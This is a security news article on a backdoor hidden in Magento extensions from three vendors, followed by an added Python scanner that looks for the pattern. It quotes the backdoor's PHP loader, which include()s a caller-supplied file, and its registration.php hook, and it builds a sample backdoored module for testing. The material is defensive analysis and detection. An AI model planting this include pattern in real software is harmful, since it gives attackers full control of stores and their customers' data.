A backdoor hidden in popular Magento extensions has quietly exposed hundreds of ecommerce stores—including a $40 billion multinational—to potential full takeover, thanks to a sophisticated supply chain attack that went undetected for years.
Security researchers at Sansec have uncovered that packages distributed by well-known Magento extension vendors—Tigren, Meetanshi, and Magesolution (MGS)—were compromised at the source level between 2019 and 2022. The attackers managed to breach the vendors’ download servers, injecting a remote execution backdoor disguised as a license check into multiple Magento modules.
At the heart of the attack is a deceptively simple adminLoadLicense function found in License.php or LicenseApi.php. It does nothing but include_once() the path it is handed, so whatever PHP that file contains runs with the privileges of the PHP process serving the store:
// The "license loader": include_once() on a caller-controlled path runs
// whatever PHP that file holds. $data is never used; the include is the point.
protected function adminLoadLicense($licenseFile)
{
    $data = include_once($licenseFile);
}
The file it loads arrives through a companion adminUploadLicense function, which in earlier versions required no authentication at all. Later variants gate the upload behind hardcoded SECURE_KEY and SIGN_KEY constants, but keys embedded in the source are no real barrier: anyone who reads the package has them, and the attackers who controlled the distribution wrote them in the first place.
The backdoor is wired in through each module's registration.php, the file Magento includes whenever it loads the module. A guarded include_once pulls in the fake license check on every load, and the file_exists guard means nothing breaks if the file is absent:
// Appended to the module's otherwise normal registration.php.
if (file_exists(__DIR__ . '/Model/System/Config/Source/Box/License/License.php')) {
    include_once(__DIR__ . '/Model/System/Config/Source/Box/License/License.php');
}
While the implementation is shared across modules, the filenames, authorization keys, and backdoor paths are customized per vendor. That variation looks deliberate: a signature written for one vendor's file names or keys misses the others, and no two packages look alike enough for an auditor to connect them.
Affected modules include some of the most commonly installed ecommerce features—wishlist managers, currency switchers, blog modules, GDPR compliance tools, and even Facebook chat integrations. These aren’t obscure extensions; they’re widely deployed across Magento stores worldwide.
Sansec notes the earliest known active abuse occurred on April 20, 2024, though the malware had been quietly present in extension packages since at least 2019. This long dormancy is unusual for supply chain compromises, which typically result in immediate exploitation. The delayed activation raises concerns that the operators were waiting for a strategic moment or using the access selectively to avoid detection.
Security recommendations are clear: scan your Magento installation immediately. Sansec's eComscan detects the malware, and stores can remove the malicious License.php (or LicenseApi.php) files to disable the backdoor; because registration.php guards the include with file_exists, deleting the file closes the hook without breaking the module. Removing it does not undo anything already run through it, so a store that exposed the upload endpoint should be treated as potentially compromised until investigated, and any installation from the affected vendors should be handled with caution.
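As an added example, and not code from Sansec's write-up or from any of the vendors named here, the following Python script turns the two indicators described above into a scan over a Magento code tree: a License*.php whose adminLoadLicense include()s the parameter it was given, and a registration.php that conditionally include_once()s such a file. Because the filenames and keys vary per vendor, it matches on the code pattern rather than on a fixed path, and it also keeps a file-hash baseline so that an "update" that changes registration.php and drops a new file stands out. The module name Example_Wishlist, the app/code layout, the key value and the regular expressions are assumptions constructed for the demo; only the two snippets quoted above are taken from the article.

```python
"""Scan a Magento code tree for the license-check backdoor pattern and diff it
against a file-hash baseline.  The sample module built in demo() is constructed
for this example; it is not a real vendor package."""
import hashlib
import re
import tempfile
from pathlib import Path

# The loader: adminLoadLicense whose body include()s the very parameter it
# was given, i.e. arbitrary PHP from a caller-chosen path.
LOADER_RE = re.compile(
    r"function\s+adminLoadLicense\s*\(\s*\$(\w+)\s*\)\s*\{[^}]*?"
    r"\binclude(?:_once)?\s*\(\s*\$\1\s*\)", re.S)
UPLOAD_RE = re.compile(r"function\s+adminUploadLicense\b")
# Hardcoded gate keys used by later variants (names as given in the article).
KEY_RE = re.compile(r"\b(SECURE_KEY|SIGN_KEY)\b\s*=\s*['\"][^'\"]+['\"]")
# The trigger: registration.php conditionally include_once()s a License*.php.
REG_RE = re.compile(
    r"file_exists\s*\(\s*__DIR__\s*\.\s*'([^']*License[^']*\.php)'\s*\)\s*\)\s*\{"
    r"\s*include_once\s*\(\s*__DIR__\s*\.\s*'\1'", re.S)


def scan_tree(root):
    """Return sorted (relative path, indicator) pairs for every *.php under root."""
    root = Path(root)
    findings = []
    for path in root.rglob("*.php"):
        text = path.read_text(errors="replace")
        rel = path.relative_to(root).as_posix()
        if path.name == "registration.php":
            m = REG_RE.search(text)
            if m:
                findings.append((rel, "registration.php autoloads " + m.group(1)))
        # Filenames differ per vendor, so inspect the code, not just the basename.
        if LOADER_RE.search(text):
            findings.append((rel, "adminLoadLicense includes caller-supplied path"))
        if UPLOAD_RE.search(text):
            findings.append((rel, "adminUploadLicense entry point present"))
        for k in KEY_RE.finditer(text):
            findings.append((rel, "hardcoded " + k.group(1)))
    return sorted(findings)


def hash_tree(root):
    """Map relative path -> sha256 hex digest, the baseline for integrity checks."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}


def diff_manifest(baseline, current):
    """Files that appeared, changed, or vanished since the baseline was taken."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    return {"added": added, "changed": changed, "removed": removed}


# --- constructed sample module (assumed layout, not a real package) ----------
CLEAN_REG = ("<?php\nuse Magento\\Framework\\Component\\ComponentRegistrar;\n"
             "ComponentRegistrar::register(ComponentRegistrar::MODULE, "
             "'Example_Wishlist', __DIR__);\n")
BACKDOOR_REG = CLEAN_REG + (
    "if (file_exists(__DIR__ . '/Model/System/Config/Source/Box/License/License.php')) {\n"
    "    include_once(__DIR__ . '/Model/System/Config/Source/Box/License/License.php');\n}\n")
BACKDOOR_LICENSE = ("<?php\nclass License {\n"
                    "    const SECURE_KEY = 'demo-key-not-real';\n"
                    "    protected function adminUploadLicense() { /* writes file */ }\n"
                    "    protected function adminLoadLicense($licenseFile)\n"
                    "    {\n        $data = include_once($licenseFile);\n    }\n}\n")


def write_file(path, text):
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_text(text)


def demo():
    """Build a clean module, baseline it, apply a backdoored 'update', scan and diff."""
    base = Path(tempfile.mkdtemp())
    mod = base / "app" / "code" / "Example" / "Wishlist"
    write_file(mod / "registration.php", CLEAN_REG)
    baseline = hash_tree(base)
    clean_hits = scan_tree(base)
    write_file(mod / "registration.php", BACKDOOR_REG)
    write_file(mod / "Model/System/Config/Source/Box/License/License.php", BACKDOOR_LICENSE)
    return clean_hits, scan_tree(base), diff_manifest(baseline, hash_tree(base))


if __name__ == "__main__":
    for part in demo():
        print(part)
```

Run scan_tree() over app/code and vendor on a real store; the baseline half only helps if hash_tree() was run on a known-good checkout before the questionable packages were installed, which is the point of keeping such a manifest continuously rather than after the fact.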
Disturbingly, vendors have responded poorly. Magesolution has not acknowledged the breach and still distributes compromised packages. Tigren denies being hacked, yet infected extensions remain publicly available. Meetanshi confirmed a server compromise but insists its software was not modified, a claim the evidence contradicts.
With attackers leveraging trusted update channels, this breach highlights just how vulnerable ecommerce platforms remain to supply chain risks. For store operators, the trust in third-party modules—particularly from popular vendors—has become a liability unless reinforced with rigorous, continuous integrity checks.
Sansec continues to investigate and encourages merchants to share any original source ZIPs for further analysis. The full details, including secure keys and affected package names, are available on Sansec’s site.